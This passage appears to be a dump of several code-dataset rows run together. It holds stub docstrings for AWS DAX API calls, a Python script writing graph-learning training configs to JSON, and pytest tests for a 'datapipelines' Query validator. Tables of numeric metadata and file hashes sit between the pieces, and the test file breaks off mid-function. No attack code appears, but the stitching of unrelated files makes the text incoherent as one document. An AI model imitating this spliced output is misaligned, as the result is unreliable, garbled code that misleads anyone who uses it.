:param Tags: [REQUIRED]\nThe tags to be assigned to the DAX resource.\n\n(dict) --A description of a tag. Every tag is a key-value pair. You can add up to 50 tags to a single DAX cluster.\nAWS-assigned tag names and values are automatically assigned the aws: prefix, which the user cannot assign. AWS-assigned tag names do not count towards the tag limit of 50. User-assigned tag names have the prefix user: .\nYou cannot backdate the application of a tag.\n\nKey (string) --The key for the tag. Tag keys are case sensitive. Every DAX cluster can only have one tag with the same key. If you try to add an existing tag (same key), the existing tag value will be updated to the new value.\n\nValue (string) --The value of the tag. Tag values are case-sensitive and can be null.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
}
Response Structure
(dict) --
Tags (list) --
The list of tags that are associated with the DAX resource.
(dict) --
A description of a tag. Every tag is a key-value pair. You can add up to 50 tags to a single DAX cluster.
AWS-assigned tag names and values are automatically assigned the aws: prefix, which the user cannot assign. AWS-assigned tag names do not count towards the tag limit of 50. User-assigned tag names have the prefix user: .
You cannot backdate the application of a tag.
Key (string) --
The key for the tag. Tag keys are case sensitive. Every DAX cluster can only have one tag with the same key. If you try to add an existing tag (same key), the existing tag value will be updated to the new value.
Value (string) --
The value of the tag. Tag values are case-sensitive and can be null.
Exceptions
DAX.Client.exceptions.ClusterNotFoundFault
DAX.Client.exceptions.TagQuotaPerResourceExceeded
DAX.Client.exceptions.InvalidARNFault
DAX.Client.exceptions.InvalidClusterStateFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
}
:returns:
DAX.Client.exceptions.ClusterNotFoundFault
DAX.Client.exceptions.TagQuotaPerResourceExceeded
DAX.Client.exceptions.InvalidARNFault
DAX.Client.exceptions.InvalidClusterStateFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
"""
pass
def untag_resource(ResourceName=None, TagKeys=None):
"""
Removes the association of tags from a DAX resource. You can call UntagResource up to 5 times per second, per account.
See also: AWS API Documentation
Exceptions
:example: response = client.untag_resource(
ResourceName='string',
TagKeys=[
'string',
]
)
:type ResourceName: string
:param ResourceName: [REQUIRED]\nThe name of the DAX resource from which the tags should be removed.\n
:type TagKeys: list
:param TagKeys: [REQUIRED]\nA list of tag keys. If the DAX cluster has any tags with these keys, then the tags are removed from the cluster.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
}
Response Structure
(dict) --
Tags (list) --
The tag keys that have been removed from the cluster.
(dict) --
A description of a tag. Every tag is a key-value pair. You can add up to 50 tags to a single DAX cluster.
AWS-assigned tag names and values are automatically assigned the aws: prefix, which the user cannot assign. AWS-assigned tag names do not count towards the tag limit of 50. User-assigned tag names have the prefix user: .
You cannot backdate the application of a tag.
Key (string) --
The key for the tag. Tag keys are case sensitive. Every DAX cluster can only have one tag with the same key. If you try to add an existing tag (same key), the existing tag value will be updated to the new value.
Value (string) --
The value of the tag. Tag values are case-sensitive and can be null.
Exceptions
DAX.Client.exceptions.ClusterNotFoundFault
DAX.Client.exceptions.InvalidARNFault
DAX.Client.exceptions.TagNotFoundFault
DAX.Client.exceptions.InvalidClusterStateFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
}
:returns:
DAX.Client.exceptions.ClusterNotFoundFault
DAX.Client.exceptions.InvalidARNFault
DAX.Client.exceptions.TagNotFoundFault
DAX.Client.exceptions.InvalidClusterStateFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
"""
pass
def update_cluster(ClusterName=None, Description=None, PreferredMaintenanceWindow=None, NotificationTopicArn=None, NotificationTopicStatus=None, ParameterGroupName=None, SecurityGroupIds=None):
"""
Modifies the settings for a DAX cluster. You can use this action to change one or more cluster configuration parameters by specifying the parameters and the new values.
See also: AWS API Documentation
Exceptions
:example: response = client.update_cluster(
ClusterName='string',
Description='string',
PreferredMaintenanceWindow='string',
NotificationTopicArn='string',
NotificationTopicStatus='string',
ParameterGroupName='string',
SecurityGroupIds=[
'string',
]
)
:type ClusterName: string
:param ClusterName: [REQUIRED]\nThe name of the DAX cluster to be modified.\n
:type Description: string
:param Description: A description of the changes being made to the cluster.
:type PreferredMaintenanceWindow: string
:param PreferredMaintenanceWindow: A range of time when maintenance of DAX cluster software will be performed. For example: sun:01:00-sun:09:00 . Cluster maintenance normally takes less than 30 minutes, and is performed automatically within the maintenance window.
:type NotificationTopicArn: string
:param NotificationTopicArn: The Amazon Resource Name (ARN) that identifies the topic.
:type NotificationTopicStatus: string
:param NotificationTopicStatus: The current state of the topic.
:type ParameterGroupName: string
:param ParameterGroupName: The name of a parameter group for this cluster.
:type SecurityGroupIds: list
:param SecurityGroupIds: A list of user-specified security group IDs to be assigned to each node in the DAX cluster. If this parameter is not specified, DAX assigns the default VPC security group to each node.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{
'Cluster': {
'ClusterName': 'string',
'Description': 'string',
'ClusterArn': 'string',
'TotalNodes': 123,
'ActiveNodes': 123,
'NodeType': 'string',
'Status': 'string',
'ClusterDiscoveryEndpoint': {
'Address': 'string',
'Port': 123
},
'NodeIdsToRemove': [
'string',
],
'Nodes': [
{
'NodeId': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123
},
'NodeCreateTime': datetime(2015, 1, 1),
'AvailabilityZone': 'string',
'NodeStatus': 'string',
'ParameterGroupStatus': 'string'
},
],
'PreferredMaintenanceWindow': 'string',
'NotificationConfiguration': {
'TopicArn': 'string',
'TopicStatus': 'string'
},
'SubnetGroup': 'string',
'SecurityGroups': [
{
'SecurityGroupIdentifier': 'string',
'Status': 'string'
},
],
'IamRoleArn': 'string',
'ParameterGroup': {
'ParameterGroupName': 'string',
'ParameterApplyStatus': 'string',
'NodeIdsToReboot': [
'string',
]
},
'SSEDescription': {
'Status': 'ENABLING'|'ENABLED'|'DISABLING'|'DISABLED'
}
}
}
Response Structure
(dict) --
Cluster (dict) --
A description of the DAX cluster, after it has been modified.
ClusterName (string) --
The name of the DAX cluster.
Description (string) --
The description of the cluster.
ClusterArn (string) --
The Amazon Resource Name (ARN) that uniquely identifies the cluster.
TotalNodes (integer) --
The total number of nodes in the cluster.
ActiveNodes (integer) --
The number of nodes in the cluster that are active (i.e., capable of serving requests).
NodeType (string) --
The node type for the nodes in the cluster. (All nodes in a DAX cluster are of the same type.)
Status (string) --
The current status of the cluster.
ClusterDiscoveryEndpoint (dict) --
The configuration endpoint for this DAX cluster, consisting of a DNS name and a port number. Client applications can specify this endpoint, rather than an individual node endpoint, and allow the DAX client software to intelligently route requests and responses to nodes in the DAX cluster.
Address (string) --
The DNS hostname of the endpoint.
Port (integer) --
The port number that applications should use to connect to the endpoint.
NodeIdsToRemove (list) --
A list of nodes to be removed from the cluster.
(string) --
Nodes (list) --
A list of nodes that are currently in the cluster.
(dict) --
Represents an individual node within a DAX cluster.
NodeId (string) --
A system-generated identifier for the node.
Endpoint (dict) --
The endpoint for the node, consisting of a DNS name and a port number. Client applications can connect directly to a node endpoint, if desired (as an alternative to allowing DAX client software to intelligently route requests and responses to nodes in the DAX cluster.
Address (string) --
The DNS hostname of the endpoint.
Port (integer) --
The port number that applications should use to connect to the endpoint.
NodeCreateTime (datetime) --
The date and time (in UNIX epoch format) when the node was launched.
AvailabilityZone (string) --
The Availability Zone (AZ) in which the node has been deployed.
NodeStatus (string) --
The current status of the node. For example: available .
ParameterGroupStatus (string) --
The status of the parameter group associated with this node. For example, in-sync .
PreferredMaintenanceWindow (string) --
A range of time when maintenance of DAX cluster software will be performed. For example: sun:01:00-sun:09:00 . Cluster maintenance normally takes less than 30 minutes, and is performed automatically within the maintenance window.
NotificationConfiguration (dict) --
Describes a notification topic and its status. Notification topics are used for publishing DAX events to subscribers using Amazon Simple Notification Service (SNS).
TopicArn (string) --
The Amazon Resource Name (ARN) that identifies the topic.
TopicStatus (string) --
The current state of the topic.
SubnetGroup (string) --
The subnet group where the DAX cluster is running.
SecurityGroups (list) --
A list of security groups, and the status of each, for the nodes in the cluster.
(dict) --
An individual VPC security group and its status.
SecurityGroupIdentifier (string) --
The unique ID for this security group.
Status (string) --
The status of this security group.
IamRoleArn (string) --
A valid Amazon Resource Name (ARN) that identifies an IAM role. At runtime, DAX will assume this role and use the role\'s permissions to access DynamoDB on your behalf.
ParameterGroup (dict) --
The parameter group being used by nodes in the cluster.
ParameterGroupName (string) --
The name of the parameter group.
ParameterApplyStatus (string) --
The status of parameter updates.
NodeIdsToReboot (list) --
The node IDs of one or more nodes to be rebooted.
(string) --
SSEDescription (dict) --
The description of the server-side encryption status on the specified DAX cluster.
Status (string) --
The current state of server-side encryption:
ENABLING - Server-side encryption is being enabled.
ENABLED - Server-side encryption is enabled.
DISABLING - Server-side encryption is being disabled.
DISABLED - Server-side encryption is disabled.
Exceptions
DAX.Client.exceptions.InvalidClusterStateFault
DAX.Client.exceptions.ClusterNotFoundFault
DAX.Client.exceptions.InvalidParameterGroupStateFault
DAX.Client.exceptions.ParameterGroupNotFoundFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'Cluster': {
'ClusterName': 'string',
'Description': 'string',
'ClusterArn': 'string',
'TotalNodes': 123,
'ActiveNodes': 123,
'NodeType': 'string',
'Status': 'string',
'ClusterDiscoveryEndpoint': {
'Address': 'string',
'Port': 123
},
'NodeIdsToRemove': [
'string',
],
'Nodes': [
{
'NodeId': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123
},
'NodeCreateTime': datetime(2015, 1, 1),
'AvailabilityZone': 'string',
'NodeStatus': 'string',
'ParameterGroupStatus': 'string'
},
],
'PreferredMaintenanceWindow': 'string',
'NotificationConfiguration': {
'TopicArn': 'string',
'TopicStatus': 'string'
},
'SubnetGroup': 'string',
'SecurityGroups': [
{
'SecurityGroupIdentifier': 'string',
'Status': 'string'
},
],
'IamRoleArn': 'string',
'ParameterGroup': {
'ParameterGroupName': 'string',
'ParameterApplyStatus': 'string',
'NodeIdsToReboot': [
'string',
]
},
'SSEDescription': {
'Status': 'ENABLING'|'ENABLED'|'DISABLING'|'DISABLED'
}
}
}
:returns:
(string) --
"""
pass
def update_parameter_group(ParameterGroupName=None, ParameterNameValues=None):
"""
Modifies the parameters of a parameter group. You can modify up to 20 parameters in a single request by submitting a list parameter name and value pairs.
See also: AWS API Documentation
Exceptions
:example: response = client.update_parameter_group(
ParameterGroupName='string',
ParameterNameValues=[
{
'ParameterName': 'string',
'ParameterValue': 'string'
},
]
)
:type ParameterGroupName: string
:param ParameterGroupName: [REQUIRED]\nThe name of the parameter group.\n
:type ParameterNameValues: list
:param ParameterNameValues: [REQUIRED]\nAn array of name-value pairs for the parameters in the group. Each element in the array represents a single parameter.\n\n(dict) --An individual DAX parameter.\n\nParameterName (string) --The name of the parameter.\n\nParameterValue (string) --The value of the parameter.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'ParameterGroup': {
'ParameterGroupName': 'string',
'Description': 'string'
}
}
Response Structure
(dict) --
ParameterGroup (dict) --
The parameter group that has been modified.
ParameterGroupName (string) --
The name of the parameter group.
Description (string) --
A description of the parameter group.
Exceptions
DAX.Client.exceptions.InvalidParameterGroupStateFault
DAX.Client.exceptions.ParameterGroupNotFoundFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'ParameterGroup': {
'ParameterGroupName': 'string',
'Description': 'string'
}
}
:returns:
DAX.Client.exceptions.InvalidParameterGroupStateFault
DAX.Client.exceptions.ParameterGroupNotFoundFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
"""
pass
def update_subnet_group(SubnetGroupName=None, Description=None, SubnetIds=None):
"""
Modifies an existing subnet group.
See also: AWS API Documentation
Exceptions
:example: response = client.update_subnet_group(
SubnetGroupName='string',
Description='string',
SubnetIds=[
'string',
]
)
:type SubnetGroupName: string
:param SubnetGroupName: [REQUIRED]\nThe name of the subnet group.\n
:type Description: string
:param Description: A description of the subnet group.
:type SubnetIds: list
:param SubnetIds: A list of subnet IDs in the subnet group.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{
'SubnetGroup': {
'SubnetGroupName': 'string',
'Description': 'string',
'VpcId': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': 'string'
},
]
}
}
Response Structure
(dict) --
SubnetGroup (dict) --
The subnet group that has been modified.
SubnetGroupName (string) --
The name of the subnet group.
Description (string) --
The description of the subnet group.
VpcId (string) --
The Amazon Virtual Private Cloud identifier (VPC ID) of the subnet group.
Subnets (list) --
A list of subnets associated with the subnet group.
(dict) --
Represents the subnet associated with a DAX cluster. This parameter refers to subnets defined in Amazon Virtual Private Cloud (Amazon VPC) and used with DAX.
SubnetIdentifier (string) --
The system-assigned identifier for the subnet.
SubnetAvailabilityZone (string) --
The Availability Zone (AZ) for the subnet.
Exceptions
DAX.Client.exceptions.SubnetGroupNotFoundFault
DAX.Client.exceptions.SubnetQuotaExceededFault
DAX.Client.exceptions.SubnetInUse
DAX.Client.exceptions.InvalidSubnet
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
:return: {
'SubnetGroup': {
'SubnetGroupName': 'string',
'Description': 'string',
'VpcId': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': 'string'
},
]
}
}
:returns:
DAX.Client.exceptions.SubnetGroupNotFoundFault
DAX.Client.exceptions.SubnetQuotaExceededFault
DAX.Client.exceptions.SubnetInUse
DAX.Client.exceptions.InvalidSubnet
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
"""
pass
| 29.436815
| 789
| 0.651458
| 11,835
| 110,182
| 6.05602
| 0.059992
| 0.023231
| 0.045331
| 0.008776
| 0.856375
| 0.842409
| 0.830131
| 0.823602
| 0.811184
| 0.804501
| 0
| 0.006004
| 0.263791
| 110,182
| 3,742
| 790
| 29.444682
| 0.877572
| 0.973907
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0.5
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
40e8a393ec0be0297cd829b769da4c6cb3b82597
| 3,508
|
py
|
Python
|
TopGraph/write_train_cfgs.py
|
mityanony404/TopGraph
|
23595ca5d3dfcd5bc5ebb771800e3fbe9a0d5eed
|
[
"MIT"
] | null | null | null |
TopGraph/write_train_cfgs.py
|
mityanony404/TopGraph
|
23595ca5d3dfcd5bc5ebb771800e3fbe9a0d5eed
|
[
"MIT"
] | null | null | null |
TopGraph/write_train_cfgs.py
|
mityanony404/TopGraph
|
23595ca5d3dfcd5bc5ebb771800e3fbe9a0d5eed
|
[
"MIT"
] | null | null | null |
import json
data = dict()
data['REDDIT-BINARY'] = {
'lr': 1e-2,
'lmda': 1e-4,
'num_epochs': 100,
'batch_size': 32,
'use_pers': 0,
'gin_num': 1,
'gin_dim': 64,
'num_lin_layers': 2,
'dataset': 'REDDIT-BINARY',
'validation_ratio': 0.1,
'use_node_degree': True,
'set_node_degree_uninformative': True,
'use_node_label': False
}
data['REDDIT-MULTI-5K'] = {
'lr': 1e-2,
'lmda': 1e-4,
'num_epochs': 100,
'batch_size': 32,
'use_pers': 0,
'gin_num': 1,
'gin_dim': 64,
'num_lin_layers': 2,
'dataset': 'REDDIT-MULTI-5K',
'validation_ratio': 0.1,
'use_node_degree': True,
'set_node_degree_uninformative': True,
'use_node_label': False
}
data['IMDB-BINARY'] = {
'lr': 1e-2,
'lmda': 1e-4,
'num_epochs': 100,
'batch_size': 32,
'use_pers': 0,
'gin_num': 1,
'gin_dim': 64,
'num_lin_layers': 2,
'validation_ratio': 0.1,
'dataset': 'IMDB-BINARY',
'use_node_degree': True,
'set_node_degree_uninformative': False,
'use_node_label': False
}
data['IMDB-MULTI'] = {
'lr': 1e-2,
'lmda': 1e-4,
'num_epochs': 100,
'batch_size': 32,
'use_pers': 0,
'gin_num': 1,
'gin_dim': 64,
'num_lin_layers': 2,
'dataset': 'IMDB-MULTI',
'validation_ratio': 0.1,
'use_node_degree': True,
'set_node_degree_uninformative': False,
'use_node_label': False
}
data['PROTEINS'] = {
'lr': 1e-2,
'lmda': 1e-4,
'num_epochs': 100,
'batch_size': 32,
'use_pers': 0,
'gin_num': 1,
'gin_dim': 64,
'num_lin_layers': 2,
'dataset': 'PROTEINS',
'validation_ratio': 0.1,
'use_node_degree': True,
'set_node_degree_uninformative': False,
'use_node_label': False
}
data['NCI1'] = {
'lr': 1e-2,
'lmda': 1e-4,
'num_epochs': 100,
'batch_size': 32,
'use_pers': 0,
'gin_num': 1,
'gin_dim': 64,
'num_lin_layers': 2,
'dataset': 'NCI1',
'validation_ratio': 0.1,
'use_node_degree': True,
'set_node_degree_uninformative': False,
'use_node_label': False
}
data['PROTEINS_2'] = {
'lr': 1e-2,
'lmda': 1e-4,
'num_epochs': 100,
'batch_size': 32,
'use_pers': 0,
'gin_num': 1,
'gin_dim': 64,
'num_lin_layers': 2,
'dataset': 'PROTEINS',
'validation_ratio': 0.1,
'use_node_degree': True,
'set_node_degree_uninformative': False,
'use_node_label': True
}
data['NCI1_2'] = {
'lr': 1e-2,
'lmda': 1e-4,
'num_epochs': 100,
'batch_size': 32,
'use_pers': 0,
'gin_num': 1,
'gin_dim': 64,
'num_lin_layers': 2,
'dataset': 'NCI1',
'validation_ratio': 0.1,
'use_node_degree': True,
'set_node_degree_uninformative': False,
'use_node_label': True
}
data['DD'] = {
'lr': 1e-2,
'lmda': 1e-4,
'num_epochs': 100,
'batch_size': 32,
'use_pers': 0,
'gin_num': 1,
'gin_dim': 64,
'num_lin_layers': 2,
'dataset': 'DD',
'validation_ratio': 0.1,
'use_node_degree': True,
'set_node_degree_uninformative': True,
'use_node_label': False
}
data['ENZYMES'] = {
'lr': 1e-2,
'lmda': 1e-4,
'num_epochs': 100,
'batch_size': 32,
'use_pers': 0,
'gin_num': 1,
'gin_dim': 64,
'num_lin_layers': 2,
'dataset': 'ENZYMES',
'validation_ratio': 0.1,
'use_node_degree': True,
'set_node_degree_uninformative': True,
'use_node_label': False
}
with open('training_cfgs.txt', 'w') as outfile:
json.dump(data, outfile)
| 22.202532
| 47
| 0.573831
| 488
| 3,508
| 3.811475
| 0.106557
| 0.075269
| 0.026882
| 0.048387
| 0.903226
| 0.903226
| 0.898925
| 0.898925
| 0.898925
| 0.898925
| 0
| 0.062945
| 0.239168
| 3,508
| 157
| 48
| 22.343949
| 0.633945
| 0
| 0
| 0.805195
| 0
| 0
| 0.460661
| 0.082668
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.006494
| 0
| 0.006494
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dc02581a708268b47ee82d879915d700f9f4fb0b
| 13,676
|
py
|
Python
|
tests/test_queries.py
|
meraki-analytics/datapipelines-python
|
dc38d7976a012039a15d67cd8b07ae77eb1e4a4c
|
[
"MIT"
] | 6
|
2018-07-27T16:16:55.000Z
|
2022-03-07T17:12:15.000Z
|
tests/test_queries.py
|
meraki-analytics/datapipelines
|
dc38d7976a012039a15d67cd8b07ae77eb1e4a4c
|
[
"MIT"
] | null | null | null |
tests/test_queries.py
|
meraki-analytics/datapipelines
|
dc38d7976a012039a15d67cd8b07ae77eb1e4a4c
|
[
"MIT"
] | 1
|
2016-10-20T11:54:20.000Z
|
2016-10-20T11:54:20.000Z
|
import pytest
from datapipelines import Query, QueryValidationError, QueryValidatorStructureError, validate_query
def test_has():
valid = Query.has("test")
with pytest.raises(QueryValidationError):
valid({})
with pytest.raises(QueryValidationError):
valid({"dog": "cat"})
assert valid({"test": "test"})
assert valid({"test": 0})
assert valid({"test": "test", "dog": "cat"})
def test_repeat_has():
with pytest.raises(QueryValidatorStructureError):
Query.has("test").has("dog")
def test_can_have():
valid = Query.can_have("test")
assert valid({})
assert valid({"dog": "cat"})
assert valid({"test": "test"})
assert valid({"test": 0})
assert valid({"test": "test", "dog": "cat"})
def test_repeat_can_have():
with pytest.raises(QueryValidatorStructureError):
Query.can_have("test").can_have("dog")
def test_repeat_have_can_have():
with pytest.raises(QueryValidatorStructureError):
Query.has("test").can_have("dog")
with pytest.raises(QueryValidatorStructureError):
Query.can_have("test").has("dog")
def test_has_as():
valid = Query.has("test").as_(str)
with pytest.raises(QueryValidationError):
valid({})
with pytest.raises(QueryValidationError):
valid({"dog": "cat"})
with pytest.raises(QueryValidationError):
valid({"test": 0})
assert valid({"test": "test"})
assert valid({"test": "test", "dog": "cat"})
def test_can_have_as():
valid = Query.can_have("test").as_(str)
with pytest.raises(QueryValidationError):
valid({"test": 0})
assert valid({})
assert valid({"dog": "cat"})
assert valid({"test": "test"})
assert valid({"test": "test", "dog": "cat"})
def test_repeat_as():
with pytest.raises(QueryValidatorStructureError):
Query.has("test").as_(str).as_(str)
with pytest.raises(QueryValidatorStructureError):
Query.can_have("test").as_(str).as_(str)
def test_has_as_any_of():
valid = Query.has("test").as_any_of({str, int})
with pytest.raises(QueryValidationError):
valid({})
with pytest.raises(QueryValidationError):
valid({"dog": "cat"})
with pytest.raises(QueryValidationError):
valid({"test": 0.0})
assert valid({"test": 0})
assert valid({"test": "test"})
assert valid({"test": "test", "dog": "cat"})
def test_can_have_as_any_of():
valid = Query.can_have("test").as_any_of({str, int})
with pytest.raises(QueryValidationError):
valid({"test": 0.0})
assert valid({})
assert valid({"dog": "cat"})
assert valid({"test": 0})
assert valid({"test": "test"})
assert valid({"test": "test", "dog": "cat"})
def test_repeat_as_any_of():
with pytest.raises(QueryValidatorStructureError):
Query.has("test").as_any_of({int, str}).as_any_of({int, str})
with pytest.raises(QueryValidatorStructureError):
Query.can_have("test").as_any_of({int, str}).as_any_of({int, str})
def test_repeat_as_as_any_of():
with pytest.raises(QueryValidatorStructureError):
Query.has("test").as_(str).as_any_of({int, str})
with pytest.raises(QueryValidatorStructureError):
Query.has("test").as_any_of({int, str}).as_(str)
with pytest.raises(QueryValidatorStructureError):
Query.can_have("test").as_(str).as_any_of({int, str})
with pytest.raises(QueryValidatorStructureError):
Query.can_have("test").as_any_of({int, str}).as_(str)
def test_has_or():
valid = Query.has("test").or_("dog").or_("foo")
with pytest.raises(QueryValidationError):
valid({})
assert valid({"test": "test"})
assert valid({"dog": "cat"})
assert valid({"foo": "bar"})
assert valid({"test": 0})
assert valid({"test": "test", "dog": "cat", "foo": "bar"})
def test_can_have_or():
valid = Query.can_have("test").or_("dog").or_("foo")
assert valid({})
assert valid({"test": "test"})
assert valid({"dog": "cat"})
assert valid({"foo": "bar"})
assert valid({"test": 0})
assert valid({"test": "test", "dog": "cat", "foo": "bar"})
def test_has_as_or():
valid = Query.has("test").as_(str).or_("dog").as_(int)
with pytest.raises(QueryValidationError):
valid({})
with pytest.raises(QueryValidationError):
valid({"test": 0})
with pytest.raises(QueryValidationError):
valid({"dog": "cat"})
assert valid({"test": "test"})
assert valid({"dog": 0})
assert valid({"test": "test", "dog": 0})
def test_can_have_as_or():
valid = Query.can_have("test").as_(str).or_("dog").as_(int)
with pytest.raises(QueryValidationError):
valid({"test": 0})
with pytest.raises(QueryValidationError):
valid({"dog": "cat"})
assert valid({})
assert valid({"test": "test"})
assert valid({"dog": 0})
assert valid({"test": "test", "dog": 0})
def test_has_as_any_of_or():
valid = Query.has("test").as_any_of({str, int}).or_("dog").as_any_of({str, int})
with pytest.raises(QueryValidationError):
valid({})
with pytest.raises(QueryValidationError):
valid({"test": 0.0})
with pytest.raises(QueryValidationError):
valid({"dog": 0.0})
assert valid({"test": "test"})
assert valid({"test": 0})
assert valid({"dog": "cat"})
assert valid({"dog": 0})
assert valid({"test": "test", "dog": 0})
def test_can_have_as_any_of_or():
valid = Query.can_have("test").as_any_of({str, int}).or_("dog").as_any_of({str, int})
with pytest.raises(QueryValidationError):
valid({"test": 0.0})
with pytest.raises(QueryValidationError):
valid({"dog": 0.0})
assert valid({})
assert valid({"test": "test"})
assert valid({"test": 0})
assert valid({"dog": "cat"})
assert valid({"dog": 0})
assert valid({"test": "test", "dog": 0})
def test_and():
valid = Query.has("test").and_("dog").and_("foo")
with pytest.raises(QueryValidationError):
valid({})
with pytest.raises(QueryValidationError):
valid({"test": "test"})
with pytest.raises(QueryValidationError):
valid({"dog": "cat"})
with pytest.raises(QueryValidationError):
valid({"foo": "bar"})
with pytest.raises(QueryValidationError):
valid({"test": 0})
assert valid({"test": "test", "dog": "cat", "foo": "bar"})
def test_has_as_and():
valid = Query.has("test").as_(str).and_("dog").as_(int)
with pytest.raises(QueryValidationError):
valid({})
with pytest.raises(QueryValidationError):
valid({"test": 0})
with pytest.raises(QueryValidationError):
valid({"dog": "cat"})
with pytest.raises(QueryValidationError):
valid({"test": "test"})
with pytest.raises(QueryValidationError):
valid({"dog": 0})
assert valid({"test": "test", "dog": 0})
def test_can_have_as_and():
valid = Query.can_have("test").as_(str).and_("dog").as_(int)
with pytest.raises(QueryValidationError):
valid({"test": 0})
with pytest.raises(QueryValidationError):
valid({"test": "test"})
with pytest.raises(QueryValidationError):
valid({"dog": "cat"})
with pytest.raises(QueryValidationError):
valid({"dog": 0})
with pytest.raises(QueryValidationError):
valid({"test": 0, "dog": "cat"})
assert valid({})
assert valid({"test": "test", "dog": 0})
def test_has_as_any_of_and():
valid = Query.has("test").as_any_of({str, int}).and_("dog").as_any_of({str, int})
with pytest.raises(QueryValidationError):
valid({})
with pytest.raises(QueryValidationError):
valid({"test": 0.0})
with pytest.raises(QueryValidationError):
valid({"dog": 0.0})
with pytest.raises(QueryValidationError):
valid({"test": "test"})
with pytest.raises(QueryValidationError):
valid({"test": 0})
with pytest.raises(QueryValidationError):
valid({"dog": "cat"})
with pytest.raises(QueryValidationError):
valid({"dog": 0})
assert valid({"test": "test", "dog": "cat"})
assert valid({"test": "test", "dog": 0})
assert valid({"test": 0, "dog": "cat"})
assert valid({"test": 0, "dog": 0})
def test_can_have_as_any_of_and():
valid = Query.can_have("test").as_any_of({str, int}).and_("dog").as_any_of({str, int})
with pytest.raises(QueryValidationError):
valid({"test": 0.0})
with pytest.raises(QueryValidationError):
valid({"test": 0})
with pytest.raises(QueryValidationError):
valid({"test": "test"})
with pytest.raises(QueryValidationError):
valid({"dog": 0.0})
with pytest.raises(QueryValidationError):
valid({"dog": 0})
with pytest.raises(QueryValidationError):
valid({"dog": "cat"})
with pytest.raises(QueryValidationError):
valid({"test": 0.0, "dog": 0.0})
assert valid({})
assert valid({"test": "test", "dog": "cat"})
assert valid({"test": "test", "dog": 0})
assert valid({"test": 0, "dog": "cat"})
assert valid({"test": 0, "dog": 0})
def test_has_nested_and_or():
valid = Query.has("test").and_("cat").or_("dog")
with pytest.raises(QueryValidationError):
valid({})
with pytest.raises(QueryValidationError):
valid({"test": "test"})
with pytest.raises(QueryValidationError):
valid({"dog": "cat"})
with pytest.raises(QueryValidationError):
valid({"cat": "dog"})
with pytest.raises(QueryValidationError):
valid({"test": "test", "foo": "bar"})
assert valid({"test": "test", "cat": "dog"})
assert valid({"test": "test", "dog": "cat"})
def test_has_nested_or_and():
valid = Query.has("test").or_("cat").and_("dog")
with pytest.raises(QueryValidationError):
valid({})
with pytest.raises(QueryValidationError):
valid({"dog": "cat"})
with pytest.raises(QueryValidationError):
valid({"cat": "dog"})
assert valid({"test": "test"})
assert valid({"dog": "cat", "cat": "dog"})
def test_can_have_nested_and_or():
valid = Query.can_have("test").and_("cat").or_("dog")
with pytest.raises(QueryValidationError):
valid({"test": "test"})
with pytest.raises(QueryValidationError):
valid({"cat": "dog"})
with pytest.raises(QueryValidationError):
valid({"dog": "cat"})
assert valid({})
assert valid({"test": "test", "dog": "cat"})
assert valid({"test": "test", "cat": "dog"})
assert valid({"test": "test", "dog": "cat", "cat": "dog"})
def test_can_have_nested_or_and():
valid = Query.can_have("test").or_("cat").and_("dog")
with pytest.raises(QueryValidationError):
valid({"dog": "cat"})
with pytest.raises(QueryValidationError):
valid({"cat": "dog"})
assert valid({})
assert valid({"test": "test"})
assert valid({"dog": "cat", "cat": "dog"})
assert valid({"test": "test", "foo": "bar"})
assert valid({"test": "test", "cat": "dog"})
assert valid({"test": "test", "dog": "cat"})
assert valid({"test": "test", "dog": "cat", "cat": "dog"})
def test_also():
valid = Query.has("test").also.has("dog").also.has("foo")
with pytest.raises(QueryValidationError):
valid({})
with pytest.raises(QueryValidationError):
valid({"test": "test"})
